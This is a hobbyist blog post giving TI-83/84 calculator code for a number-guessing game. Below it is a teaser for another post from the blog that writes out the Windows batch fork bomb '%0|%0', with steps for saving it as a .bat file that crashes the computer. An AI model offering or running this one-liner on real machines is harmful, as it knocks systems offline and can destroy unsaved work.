Friday, January 17, 2014

Guessing game for TI 84 or 83

: randInt (1, 100) --> A
: Disp "GUESS MY NUMBER"
: 1 --> C
: Lbl 1
: Input B
: If B>A
: Then 
: Disp "Lower"
: C+1 --> C
: Goto 1
: Else
: If B<A
: Then
: Disp "HIGHER"
: C+1 --> C
: Goto 1
: Else
: If B=A
: Then
: Disp "YOU WIN"
: Disp C
Please like subscribe and follow

No comments:

Post a Comment

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...